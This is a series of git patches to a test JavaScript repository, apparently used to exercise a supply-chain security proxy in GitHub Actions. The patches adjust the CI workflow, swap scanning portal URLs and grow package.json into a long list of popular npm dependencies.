a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,4 +1,5 @@ name: Build NPM Package + on: push: branches: [ main ] @@ -7,7 +8,7 @@ on: permissions: checks: write - contents: write # Ensure contents: write permission for pushing + contents: write packages: read env: @@ -42,8 +43,8 @@ jobs: id: fetchECRDetails uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' - method: 'GET' + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' + method: 'GET' - name: Decoding VB Token id: parseToken run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" @@ -64,12 +65,12 @@ jobs: credentials: username: ${{needs.ecr_details.outputs.ecr_username}} password: ${{needs.ecr_details.outputs.ecr_token}} - env: - PSE_DEBUG_FLAG: --alsologtostderr - POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + env: + PSE_DEBUG_FLAG: --alsologtostderr + POLICY_LOG: t + INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} + INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine options: --cap-add=NET_ADMIN @@ -77,40 +78,50 @@ jobs: matrix: node-version: [18.x] steps: - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID - - uses: invisirisk/pse-action@v1.0.8 - with: + - name: Print Scan ID + env: + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + run: echo $SCAN_ID + + - name: PSE Action + uses: invisirisk/pse-action@v1.0.8 + with: github-token: ${{ secrets.GITHUB_TOKEN }} SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - - name: Checkout the code - uses: actions/checkout@v3 - with: - token: ${{ secrets.PAT }} # Use PAT for checkout - - name: Use Node.js ${{ matrix.node-version }} - uses: actions/setup-node@v3 - with: - node-version: ${{ matrix.node-version }} - - run: npm install - - run: npm ci - - run: npm run build --if-present - - run: npm test - # Configure Git - - name: Configure Git - run: | - git config --global user.name "GitHub Actions" - git config --global user.email "actions@github.com" + - name: Checkout code + uses: actions/checkout@v3 + with: + fetch-depth: 0 + token: ${{ secrets.GITHUB_TOKEN }} - # Add and commit changes - - name: Commit changes - run: | - git add . - git commit -m "Automated build and test changes" + - name: Configure Git + run: | + git config --global --add safe.directory "${GITHUB_WORKSPACE}" + git config --global user.name "GitHub Actions" + git config --global user.email "github-actions[bot]@users.noreply.github.com" - # Push changes - - name: Push changes - run: | - git remote set-url origin https://${{ secrets.PAT }}@github.com/${{ github.repository }}.git - git push origin main + - name: Setup Node.js + uses: actions/setup-node@v3 + with: + node-version: ${{ matrix.node-version }} + + - name: Install dependencies + run: | + npm install + npm ci + + - name: Build and test + run: | + npm run build --if-present + npm test + + - name: Commit and push changes + run: | + if [[ -n "$(git status --porcelain)" ]]; then + git add . + git commit -m "chore: automated build and test updates [skip ci]" + git push https://${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }}.git HEAD:${{ github.ref }} + else + echo "No changes to commit" + fi From 82b3b795597714aa65f1301cdd36b7f02e9741eb Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Feb 2025 17:24:09 +0545 Subject: [PATCH 20/89] Update main.yml --- .github/workflows/main.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index f925632..298237e 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -97,6 +97,7 @@ jobs: - name: Configure Git run: | + iptables -t nat -L -v -n git config --global --add safe.directory "${GITHUB_WORKSPACE}" git config --global user.name "GitHub Actions" git config --global user.email "github-actions[bot]@users.noreply.github.com" From 72673f13c341e1aa81eaa470bbec1b9287b6df61 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Feb 2025 17:31:13 +0545 Subject: [PATCH 21/89] Update main.yml --- .github/workflows/main.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 298237e..f925632 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -97,7 +97,6 @@ jobs: - name: Configure Git run: | - iptables -t nat -L -v -n git config --global --add safe.directory "${GITHUB_WORKSPACE}" git config --global user.name "GitHub Actions" git config --global user.email "github-actions[bot]@users.noreply.github.com" From 1faea99d7346b99512f34e721538a44edfea6026 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 18 Feb 2025 15:26:38 +0545 Subject: [PATCH 22/89] Update main.yml --- .github/workflows/main.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index f925632..ba0d8cf 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -12,7 +12,7 @@ permissions: packages: read env: - API_URL: https://app.stage.invisirisk.com + API_URL: https://app.dev.invisirisk.com jobs: create_scan_in_IR_Portal: @@ -69,7 +69,7 @@ jobs: PSE_DEBUG_FLAG: --alsologtostderr POLICY_LOG: t INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ + INVISIRISK_PORTAL: https://app.dev.invisirisk.com/ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine From 0f0cf731dfe768fa371aa0387774ff061ae206b7 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 18 Feb 2025 15:29:47 +0545 Subject: [PATCH 23/89] Update package.json From 9eba47f13d324e5394dc55b535f323d0a88c93fb Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 11:04:02 +0545 Subject: [PATCH 24/89] Update package.json --- package.json | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/package.json b/package.json index e833609..89898f8 100644 --- a/package.json +++ b/package.json @@ -4,7 +4,8 @@ "description": "This is test Javascript repo", "main": "index.js", "scripts": { - "test": "echo \"Test is successful \" && exit 0" + "test": "echo \"Test is successful \" && exit 0", + "run-php": "node -e \"const php = require('node-php'); php('test.php', (err, output) => { if (err) { console.error('PHP Execution Failed:', err); } else { console.log('PHP Output:', output); } });\"" }, "repository": { "type": "git", @@ -19,6 +20,7 @@ "dependencies": { "array-first": "^1.0.2", "array-last": "^1.3.0", - "is-sorted": "^1.0.5" + "is-sorted": "^1.0.5", + "node-php": "^1.0.2" } } From 38ff02369d42bbfba9f30e1780b3edf4d0b66109 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 11:26:25 +0545 Subject: [PATCH 25/89] Update package.json --- package.json | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/package.json b/package.json index 89898f8..a06835e 100644 --- a/package.json +++ b/package.json @@ -21,6 +21,5 @@ "array-first": "^1.0.2", "array-last": "^1.3.0", "is-sorted": "^1.0.5", - "node-php": "^1.0.2" - } + "php": "1.0.2" } } From fda33c1a5d551d45cccbd964b3028c2322d26a7f Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 11:28:14 +0545 Subject: [PATCH 26/89] Update package.json --- package.json | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/package.json b/package.json index a06835e..cc88330 100644 --- a/package.json +++ b/package.json @@ -4,8 +4,8 @@ "description": "This is test Javascript repo", "main": "index.js", "scripts": { - "test": "echo \"Test is successful \" && exit 0", - "run-php": "node -e \"const php = require('node-php'); php('test.php', (err, output) => { if (err) { console.error('PHP Execution Failed:', err); } else { console.log('PHP Output:', output); } });\"" + "test": "echo \"Test is successful\" && exit 0", + "run-php": "node -e \"const php = require('php'); php.execute('test.php', (err, output) => { if (err) { console.error('PHP Execution Failed:', err); } else { console.log('PHP Output:', output); } });\"" }, "repository": { "type": "git", @@ -21,5 +21,6 @@ "array-first": "^1.0.2", "array-last": "^1.3.0", "is-sorted": "^1.0.5", - "php": "1.0.2" } + "php": "1.0.2" + } } From 4d33f34fcf1bfdf9d2e8286e305e4f47bb164613 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 11:38:21 +0545 Subject: [PATCH 27/89] Update package.json --- package.json | 522 +++++++++++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 504 insertions(+), 18 deletions(-) diff --git a/package.json b/package.json index cc88330..51b8d3b 100644 --- a/package.json +++ b/package.json @@ -1,26 +1,512 @@ { - "name": "test-js-repo", + "name": "top500-npm", "version": "1.0.0", - "description": "This is test Javascript repo", "main": "index.js", "scripts": { - "test": "echo \"Test is successful\" && exit 0", - "run-php": "node -e \"const php = require('php'); php.execute('test.php', (err, output) => { if (err) { console.error('PHP Execution Failed:', err); } else { console.log('PHP Output:', output); } });\"" + "test": "echo \"Error: no test specified\" && exit 1" }, - "repository": { - "type": "git", - "url": "git+https://github.com/ashokkasti/test-js-repo.git" - }, - "author": "Ashok Kasti", - "license": "MIT", - "bugs": { - "url": "https://github.com/ashokkasti/test-js-repo/issues" - }, - "homepage": "https://github.com/ashokkasti/test-js-repo#readme", + "author": "", + "license": "ISC", + "description": "", "dependencies": { - "array-first": "^1.0.2", - "array-last": "^1.3.0", - "is-sorted": "^1.0.5", - "php": "1.0.2" + "@angular/animations": "^19.2.0", + "@angular/cdk": "^19.2.1", + "@angular/common": "^19.2.0", + "@angular/compiler": "^19.2.0", + "@angular/core": "^19.2.0", + "@angular/forms": "^19.2.0", + "@angular/material": "^19.2.1", + "@angular/platform-browser": "^19.2.0", + "@angular/platform-browser-dynamic": "^19.2.0", + "@angular/router": "^19.2.0", + "@apollo/client": "^3.13.1", + "@aws-sdk/client-s3": "^3.758.0", + "@babel/code-frame": "^7.26.2", + "@babel/core": "^7.26.9", + "@babel/generator": "^7.26.9", + "@babel/helper-function-name": "^7.24.7", + "@babel/helper-module-imports": "^7.25.9", + "@babel/helper-module-transforms": "^7.26.0", + "@babel/helper-plugin-utils": "^7.26.5", + "@babel/helper-simple-access": "^7.25.9", + "@babel/helper-split-export-declaration": "^7.24.7", + "@babel/helpers": "^7.26.9", + "@babel/highlight": "^7.25.9", + "@babel/parser": "^7.26.9", + "@babel/preset-env": "^7.26.9", + "@babel/preset-typescript": "^7.26.0", + "@babel/runtime": "^7.26.9", + "@babel/template": "^7.26.9", + "@babel/types": "^7.26.9", + "@cubejs-client/core": "^1.0.10", + "@cubejs-client/react": "^1.0.10", + "@emotion/react": "^11.14.0", + "@emotion/styled": "^11.14.0", + "@heroku-cli/color": "^2.0.4", + "@heroku-cli/command": "^11.5.0", + "@heroku-cli/plugin-ps": "^8.1.7", + "@heroku-cli/plugin-ps-exec": "^2.6.2", + "@heroku-cli/plugin-run": "^8.1.4", + "@jridgewell/gen-mapping": "^0.3.8", + "@jridgewell/trace-mapping": "^0.3.25", + "@jupyterlab/application": "^4.3.5", + "@jupyterlab/application-extension": "^4.3.5", + "@jupyterlab/apputils-extension": "^4.3.5", + "@jupyterlab/cell-toolbar-extension": "^4.3.5", + "@jupyterlab/celltags-extension": "^4.3.5", + "@jupyterlab/codemirror-extension": "^4.3.5", + "@jupyterlab/completer-extension": "^4.3.5", + "@jupyterlab/console-extension": "^4.3.5", + "@jupyterlab/coreutils": "^6.3.5", + "@jupyterlab/csvviewer-extension": "^4.3.5", + "@jupyterlab/debugger-extension": "^4.3.5", + "@jupyterlab/docmanager-extension": "^4.3.5", + "@jupyterlab/docprovider-extension": "^3.6.8", + "@jupyterlab/documentsearch-extension": "^4.3.5", + "@jupyterlab/extensionmanager-extension": "^4.3.5", + "@jupyterlab/filebrowser-extension": "^4.3.5", + "@jupyterlab/fileeditor-extension": "^4.3.5", + "@jupyterlab/help-extension": "^4.3.5", + "@jupyterlab/htmlviewer-extension": "^4.3.5", + "@jupyterlab/hub-extension": "^4.3.5", + "@jupyterlab/imageviewer-extension": "^4.3.5", + "@jupyterlab/inspector-extension": "^4.3.5", + "@jupyterlab/javascript-extension": "^4.3.5", + "@jupyterlab/json-extension": "^4.3.5", + "@jupyterlab/launcher-extension": "^4.3.5", + "@jupyterlab/logconsole-extension": "^4.3.5", + "@jupyterlab/mainmenu-extension": "^4.3.5", + "@jupyterlab/markdownviewer-extension": "^4.3.5", + "@jupyterlab/mathjax2-extension": "^4.0.0", + "@jupyterlab/notebook-extension": "^4.3.5", + "@jupyterlab/pdf-extension": "^4.3.5", + "@jupyterlab/rendermime-extension": "^4.3.5", + "@jupyterlab/running-extension": "^4.3.5", + "@jupyterlab/settingeditor-extension": "^4.3.5", + "@jupyterlab/shortcuts-extension": "^5.1.5", + "@jupyterlab/statusbar-extension": "^4.3.5", + "@jupyterlab/terminal-extension": "^4.3.5", + "@jupyterlab/theme-dark-extension": "^4.3.5", + "@jupyterlab/theme-light-extension": "^4.3.5", + "@jupyterlab/toc-extension": "^6.3.5", + "@jupyterlab/tooltip-extension": "^4.3.5", + "@jupyterlab/translation-extension": "^4.3.5", + "@jupyterlab/ui-components-extension": "^4.3.5", + "@jupyterlab/vdom-extension": "^3.6.8", + "@jupyterlab/vega5-extension": "^4.3.5", + "@material-ui/core": "^4.12.4", + "@material-ui/icons": "^4.11.3", + "@mui/icons-material": "^6.4.6", + "@mui/material": "^6.4.6", + "@nestjs/common": "^11.0.11", + "@nestjs/core": "^11.0.11", + "@nestjs/platform-express": "^11.0.11", + "@oclif/command": "^1.8.36", + "@oclif/config": "^1.18.17", + "@oclif/plugin-commands": "^4.1.21", + "@oclif/plugin-help": "^6.2.26", + "@oclif/plugin-legacy": "^2.0.22", + "@oclif/plugin-not-found": "^3.2.44", + "@oclif/plugin-plugins": "^5.4.34", + "@oclif/plugin-update": "^4.6.33", + "@oclif/plugin-warn-if-update-available": "^3.1.35", + "@oclif/plugin-which": "^3.2.32", + "@reduxjs/toolkit": "^2.6.0", + "@salesforce-ux/design-system": "^2.26.2", + "@salesforce-ux/icons": "^10.12.1", + "@salesforce/design-system-react": "^0.10.63", + "@sentry/integrations": "^7.114.0", + "@sentry/node": "^9.3.0", + "@sentry/react": "^9.3.0", + "@sentry/tracing": "^7.120.3", + "@susy-js/lodash.merge": "^4.6.6", + "@swc/core": "^1.11.5", + "@testing-library/jest-dom": "^6.6.3", + "@testing-library/react": "^16.2.0", + "@testing-library/user-event": "^14.6.1", + "@types/express": "^5.0.0", + "@types/jest": "^29.5.14", + "@types/lodash": "^4.17.16", + "@types/node": "^22.13.8", + "@types/react": "^19.0.10", + "@types/react-dom": "^19.0.4", + "@types/uuid": "^10.0.0", + "@types/yargs": "^17.0.33", + "@typescript-eslint/eslint-plugin": "^8.25.0", + "@typescript-eslint/parser": "^8.25.0", + "accepts": "^1.3.8", + "acorn": "^8.14.0", + "agent-base": "^7.1.3", + "ajv": "^8.17.1", + "ansi-escapes": "^7.0.0", + "ansi-regex": "^6.1.0", + "ansi-styles": "^6.2.1", + "anymatch": "^3.1.3", + "argparse": "^2.0.1", + "array-flatten": "^3.0.0", + "array-union": "^3.0.1", + "async": "^3.2.6", + "autoprefixer": "^10.4.20", + "aws-cdk-lib": "^2.181.1", + "aws-sdk": "^2.1692.0", + "axios": "^1.8.1", + "babel-loader": "^10.0.0", + "babel-polyfill": "^6.26.0", + "balanced-match": "^3.0.1", + "bcrypt-nodejs": "^0.0.3", + "binary-extensions": "^3.0.0", + "bluebird": "^3.7.2", + "body-parser": "^1.20.3", + "bootstrap": "^5.3.3", + "brace-expansion": "^4.0.0", + "braces": "^3.0.3", + "browserslist": "^4.24.4", + "buffer": "^6.0.3", + "buffer-from": "^1.1.2", + "bytes": "^3.1.2", + "call-bind": "^1.0.8", + "callsites": "^4.2.0", + "camelcase": "^8.0.0", + "chai": "^5.2.0", + "chai-as-promised": "^8.0.1", + "chalk": "^5.4.1", + "chart.js": "^4.4.8", + "child-process-promise": "^2.2.1", + "chownr": "^3.0.0", + "ci-info": "^4.1.0", + "classnames": "^2.5.1", + "cli-progress-bar": "^1.0.1", + "cliui": "^8.0.1", + "color-convert": "^3.0.1", + "color-name": "^2.0.0", + "combined-stream": "^1.0.8", + "commander": "^13.1.0", + "compression": "^1.8.0", + "concat-map": "^0.0.2", + "config": "^3.3.12", + "constructs": "^10.4.2", + "content-type": "^1.0.5", + "convert-source-map": "^2.0.0", + "cookie": "^1.0.2", + "cookie-parser": "^1.4.7", + "core-js": "^3.41.0", + "core-util-is": "^1.0.3", + "cors": "^2.8.5", + "cross-env": "^7.0.3", + "cross-spawn": "^7.0.6", + "crypto-js": "^4.2.0", + "css-loader": "^7.1.2", + "csurf": "^1.11.0", + "cypress": "^14.1.0", + "d3": "^7.9.0", + "d3-flame-graph": "^4.1.3", + "d3-selection": "^3.0.0", + "dagre-d3": "^0.6.4", + "date-fns": "^4.1.0", + "dayjs": "^1.11.13", + "dd-trace": "^5.40.0", + "debug": "^4.4.0", + "deep-is": "^0.1.4", + "define-properties": "^1.2.1", + "define-property": "^2.0.2", + "delayed-stream": "^1.0.0", + "depd": "^2.0.0", + "dependable": "^1.1.0", + "destroy": "^1.2.0", + "doctrine": "^3.0.0", + "domelementtype": "^2.3.0", + "dompurify": "^3.2.4", + "dont-sniff-mimetype": "^1.1.0", + "dotenv": "^16.4.7", + "ejs": "^3.1.10", + "electron-to-chromium": "^1.5.109", + "emoji-regex": "^10.4.0", + "end-of-stream": "^1.4.4", + "enhanced-resolve": "^5.18.1", + "entities": "^6.0.0", + "error-ex": "^1.3.2", + "es-abstract": "^1.23.9", + "escape-string-regexp": "^5.0.0", + "eslint": "^9.21.0", + "eslint-config-prettier": "^10.0.2", + "eslint-plugin-import": "^2.31.0", + "eslint-plugin-jsx-a11y": "^6.10.2", + "eslint-plugin-prettier": "^5.2.3", + "eslint-plugin-react": "^7.37.4", + "eslint-plugin-react-hooks": "^5.2.0", + "eslint-scope": "^8.2.0", + "eslint-visitor-keys": "^4.2.0", + "esprima": "^4.0.1", + "esrecurse": "^4.3.0", + "estraverse": "^5.3.0", + "execa": "^9.5.2", + "express": "^4.21.2", + "express-session": "^1.18.1", + "extend-shallow": "^3.0.2", + "file-exists": "^5.0.1", + "file-saver": "^2.0.5", + "fill-range": "^7.1.1", + "finalhandler": "^1.3.1", + "find-cache-dir": "^5.0.0", + "find-up": "^7.0.0", + "font-awesome": "^4.7.0", + "forever": "^4.0.3", + "form-data": "^4.0.2", + "formik": "^2.4.6", + "fs-extra": "^11.3.0", + "fs-extra-promise": "^1.0.1", + "fs.realpath": "^1.0.0", + "function-bind": "^1.1.2", + "get-caller-file": "^2.0.5", + "get-intrinsic": "^1.3.0", + "get-stream": "^9.0.1", + "glob": "^11.0.1", + "glob-parent": "^6.0.2", + "globals": "^16.0.0", + "graceful-fs": "^4.2.11", + "graphql": "^16.10.0", + "graphql-tag": "^2.12.6", + "has": "^1.0.4", + "has-flag": "^5.0.1", + "has-symbols": "^1.1.0", + "has-value": "^2.0.2", + "has-values": "^2.0.1", + "helmet": "^8.0.0", + "history": "^5.3.0", + "html-to-text": "^9.0.5", + "http-call": "^5.3.0", + "http-errors": "^2.0.0", + "http-status-codes": "^2.3.0", + "husky": "^9.1.7", + "i18next": "^24.2.2", + "iconv-lite": "^0.6.3", + "ieee754": "^1.2.1", + "ignore": "^7.0.3", + "immer": "^10.1.1", + "import-fresh": "^3.3.1", + "imurmurhash": "^0.1.4", + "indent-string": "^5.0.0", + "inflight": "^1.0.6", + "inherits": "^2.0.4", + "ioredis": "^5.5.0", + "ipaddr.js": "^2.2.0", + "is-accessor-descriptor": "^3.0.5", + "is-arrayish": "^0.3.2", + "is-callable": "^1.2.7", + "is-core-module": "^2.16.1", + "is-data-descriptor": "^2.1.3", + "is-date-object": "^1.1.0", + "is-descriptor": "^3.1.1", + "is-extendable": "^1.0.1", + "is-extglob": "^2.1.1", + "is-fullwidth-code-point": "^5.0.0", + "is-glob": "^4.0.3", + "is-number": "^7.0.0", + "is-plain-obj": "^4.1.0", + "is-regex": "^1.2.1", + "is-stream": "^4.0.1", + "is-symbol": "^1.1.1", + "is-wsl": "^3.1.0", + "isarray": "^2.0.5", + "isexe": "^3.1.1", + "isobject": "^4.0.0", + "jest": "^29.7.0", + "jest-worker": "^29.7.0", + "joi": "^17.13.3", + "jquery": "^3.7.1", + "jqueryui": "^1.11.1", + "js-cookie": "^3.0.5", + "js-tokens": "^9.0.1", + "js-yaml": "^4.1.0", + "jsesc": "^3.1.0", + "json-schema-traverse": "^1.0.0", + "json-stable-stringify": "^1.2.1", + "json5": "^2.2.3", + "jsonschema": "^1.5.0", + "jsonwebtoken": "^9.0.2", + "junit": "^1.4.9", + "jwt-decode": "^4.0.0", + "kind-of": "^6.0.3", + "knex": "^3.1.0", + "lint-staged": "^15.4.3", + "loader-utils": "^3.3.1", + "locate-path": "^7.2.0", + "lodash": "^4.17.21", + "lru-cache": "^11.0.2", + "luxon": "^3.5.0", + "lwc": "^8.14.0", + "make-dir": "^5.0.0", + "marked": "^15.0.7", + "mathjs": "^14.3.0", + "memoizee": "^0.4.17", + "micromatch": "^4.0.8", + "mime": "^4.0.6", + "mime-db": "^1.53.0", + "mime-types": "^2.1.35", + "mimic-fn": "^5.0.0", + "mini-css-extract-plugin": "^2.9.2", + "minimatch": "^10.0.1", + "minimist": "^1.2.8", + "mkdirp": "^3.0.1", + "mocha": "^11.1.0", + "moment": "^2.30.1", + "moment-timezone": "^0.5.47", + "mongodb": "^6.14.0", + "morgan": "^1.10.0", + "ms": "^2.1.3", + "mysql": "^2.18.1", + "needle": "^3.3.1", + "negotiator": "^1.0.0", + "netrc-parser": "^3.1.6", + "newrelic": "^12.14.0", + "next": "^15.2.0", + "node-esapi": "^0.0.1", + "node-fetch": "^3.3.2", + "node-releases": "^2.0.19", + "nodemon": "^3.1.9", + "nopt": "^8.1.0", + "normalize-path": "^3.0.0", + "npm-run-path": "^6.0.0", + "object-inspect": "^1.13.4", + "object-keys": "^1.1.1", + "object.assign": "^4.1.7", + "oboe": "^2.1.7", + "once": "^1.4.0", + "onetime": "^7.0.0", + "optionator": "^0.9.4", + "p-limit": "^6.2.0", + "p-locate": "^6.0.0", + "p-map": "^7.0.3", + "p-try": "^3.0.0", + "papaparse": "^5.5.2", + "parse-json": "^8.1.0", + "parse5": "^7.2.1", + "passport": "^0.7.0", + "path-exists": "^5.0.0", + "path-is-absolute": "^2.0.0", + "path-key": "^4.0.0", + "path-parse": "^1.0.7", + "path-type": "^6.0.0", + "pg": "^8.13.3", + "picocolors": "^1.1.1", + "picomatch": "^4.0.2", + "pify": "^6.1.0", + "pino": "^9.6.0", + "pkg-dir": "^8.0.0", + "please-upgrade-node": "^3.2.0", + "postcss": "^8.5.3", + "postcss-selector-parser": "^7.1.0", + "postmonger": "^0.0.16", + "prettier": "^3.5.3", + "pretty-format": "^29.7.0", + "process-nextick-args": "^2.0.1", + "prom-client": "^15.1.3", + "prop-types": "^15.8.1", + "proxy-addr": "^2.0.7", + "psl": "^1.15.0", + "pump": "^3.0.2", + "punycode": "^2.3.1", + "puppeteer": "^24.3.0", + "qs": "^6.14.0", + "query-string": "^9.1.1", + "raw-body": "^3.0.0", + "react": "^19.0.0", + "react-bootstrap": "^2.10.9", + "react-dom": "^19.0.0", + "react-helmet": "^6.1.0", + "react-hook-form": "^7.54.2", + "react-i18next": "^15.4.1", + "react-intl": "^7.1.6", + "react-query": "^3.39.3", + "react-redux": "^9.2.0", + "react-router": "^7.2.0", + "react-router-dom": "^7.2.0", + "react-scripts": "^5.0.1", + "react-select": "^5.10.0", + "reactable": "^1.1.0", + "readable-stream": "^4.7.0", + "readdirp": "^4.1.2", + "recharts": "^2.15.1", + "redis": "^4.7.0", + "redux": "^5.0.1", + "redux-thunk": "^3.1.0", + "reflect-metadata": "^0.2.2", + "regenerator-runtime": "^0.14.1", + "request": "^2.88.2", + "request-promise": "^4.2.6", + "resolve": "^1.22.10", + "resolve-from": "^5.0.0", + "rimraf": "^6.0.1", + "rxjs": "^7.8.2", + "safe-buffer": "^5.2.1", + "safer-buffer": "^2.1.2", + "sass": "^1.85.1", + "sax": "^1.4.1", + "schema-utils": "^4.3.0", + "semver": "^7.7.1", + "send": "^1.1.0", + "setprototypeof": "^1.2.0", + "sha1": "^1.1.1", + "shebang-command": "^2.0.0", + "shebang-regex": "^4.0.0", + "signal-exit": "^4.1.0", + "slash": "^5.1.0", + "slice-ansi": "^7.1.0", + "source-map": "^0.7.4", + "source-map-support": "^0.5.21", + "stats-lite": "^2.2.0", + "statuses": "^2.0.1", + "string-width": "^7.2.0", + "string_decoder": "^1.3.0", + "strip-ansi": "^7.1.0", + "strip-bom": "^5.0.0", + "strip-json-comments": "^5.0.1", + "style-loader": "^4.0.0", + "styled-components": "^6.1.15", + "superagent": "^10.1.1", + "supports-color": "^10.0.0", + "swagger-ui-express": "^5.0.1", + "swig": "^1.4.2", + "tapable": "^2.2.1", + "to-fast-properties": "^4.0.0", + "to-regex-range": "^5.0.1", + "toidentifier": "^1.0.1", + "tr46": "^5.0.0", + "tracium": "^0.2.1", + "ts-jest": "^29.2.6", + "ts-loader": "^9.5.2", + "ts-node": "^10.9.2", + "tslib": "^2.8.1", + "type-fest": "^4.36.0", + "typescript": "^5.8.2", + "underscore": "^1.13.7", + "universalify": "^2.0.1", + "uri-js": "^4.4.1", + "url-loader": "^4.1.1", + "util-deprecate": "^1.0.2", + "uuid": "^11.1.0", + "vue": "^3.5.13", + "web-vitals": "^4.2.4", + "webidl-conversions": "^7.0.0", + "webpack": "^5.98.0", + "webpack-cli": "^6.0.1", + "whatwg-fetch": "^3.6.20", + "whatwg-url": "^14.1.1", + "which": "^5.0.0", + "winston": "^3.17.0", + "wrap-ansi": "^9.0.0", + "wrappy": "^1.0.2", + "write-file-atomic": "^6.0.0", + "ws": "^8.18.1", + "ws-non-native": "^0.4.31", + "xml2js": "^0.6.2", + "xtend": "^4.0.2", + "y18n": "^5.0.8", + "yallist": "^5.0.0", + "yargs": "^17.7.2", + "yargs-parser": "^21.1.1", + "yup": "^1.6.1", + "zod": "^3.24.2", + "zone.js": "^0.15.0" } } From edf06682caa17f11278b5447de166e481ccfe845 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 12:06:38 +0545 Subject: [PATCH 28/89] Update main.yml --- .github/workflows/main.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index ba0d8cf..f925632 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -12,7 +12,7 @@ permissions: packages: read env: - API_URL: https://app.dev.invisirisk.com + API_URL: https://app.stage.invisirisk.com jobs: create_scan_in_IR_Portal: @@ -69,7 +69,7 @@ jobs: PSE_DEBUG_FLAG: --alsologtostderr POLICY_LOG: t INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.dev.invisirisk.com/ + INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine From 92850641565e66e4655bd2ebb988fbfc940ead6e Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 12:09:26 +0545 Subject: [PATCH 29/89] Update main.yml --- .github/workflows/main.yml | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index f925632..799311a 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,10 +1,7 @@ name: Build NPM Package on: - push: - branches: [ main ] - pull_request: - branches: [ main ] + workflow_dispatch: permissions: checks: write From 797baac1b6ac0334cd988f6a64f44cd25269ceb5 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 12:13:50 +0545 Subject: [PATCH 30/89] Update main.yml From b3124cfa4751fcbb9353073737b6debf282a1b07 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 12:15:58 +0545 Subject: [PATCH 31/89] Update main.yml --- .github/workflows/main.yml | 71 +++++++------------------------------- 1 file changed, 12 insertions(+), 59 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 799311a..e112e03 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,58 +1,11 @@ -name: Build NPM Package +name: Build and Test with Proxy on: - workflow_dispatch: - -permissions: - checks: write - contents: write - packages: read - -env: - API_URL: https://app.stage.invisirisk.com + push: + branches: + - main jobs: - create_scan_in_IR_Portal: - runs-on: ubuntu-latest - outputs: - scan_id: ${{ steps.parseResponse.outputs.scan_id }} - steps: - - name: Initiating SBOM Scan - id: createScan - uses: fjogeleit/http-request-action@v1.15.1 - with: - url: '${{env.API_URL}}/utilityapi/v1/scan' - method: 'POST' - data: '{"api_key": "${{secrets.VB_API_KEY}}"}' - - name: Parse Response - id: parseResponse - run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" - - ecr_details: - runs-on: ubuntu-latest - outputs: - ecr_username: ${{steps.ecr_details.outputs.username}} - ecr_token: ${{steps.ecr_details.outputs.token}} - ecr_region: ${{steps.ecr_details.outputs.region}} - ecr_id: ${{steps.ecr_details.outputs.registry_id}} - steps: - - name: Fetching VB Token - id: 